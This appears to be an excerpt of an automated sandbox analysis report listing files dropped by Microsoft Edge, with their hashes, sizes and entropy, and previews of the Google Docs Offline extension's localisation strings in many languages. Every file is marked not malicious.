                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1065
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2771
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                                          MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                                          SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                                          SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                                          SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):858
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                                          MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                                          SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                                          SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                                          SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):954
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                                          MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                                          SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                                          SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                                          SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):899
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                                          MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                                          SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                                          SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                                          SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2230
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                                          MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                                          SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                                          SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                                          SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1160
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                                          MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                                          SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                                          SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                                          SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):3264
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):3235
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):3122
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1895
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1042
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2535
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1028
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):994
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2091
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2778
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1719
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):936
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):3830
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                          MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                          SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                          SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                          SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1898
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                          MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                          SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                          SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                          SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                          MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                          SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                          SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                          SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):878
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                          MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                          SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                          SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                          SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2766
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
